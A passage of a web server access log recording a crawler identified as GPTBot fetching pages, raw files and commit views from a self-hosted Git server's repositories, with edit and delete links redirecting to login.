"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16672] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 11079] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10056] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" -[17/Feb/2026:16:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 97375] [Gzip 18.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 14802] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 48296] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fflags.make" [Client 74.7.227.38] [Length 25183] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fTargetDirectories.txt" [Client 74.7.227.38] [Length 23188] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 19840] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 1432] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 10063] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:16:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fCMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 36306] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fTargetDirectories.txt" [Client 74.7.227.38] [Length 24969] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:46:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fprogress.marks" [Client 74.7.227.38] [Length 22643] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fCMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 36832] [Gzip 7.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15588] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14246] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14859] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" -[17/Feb/2026:16:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13971] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" -[17/Feb/2026:16:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16514] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10307] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10306] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10310] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10239] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10264] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10265] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs?display=rendered" [Client 74.7.227.38] [Length 11113] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 12866] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 19746] [Gzip 7.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33369] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33664] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33661] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33663] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 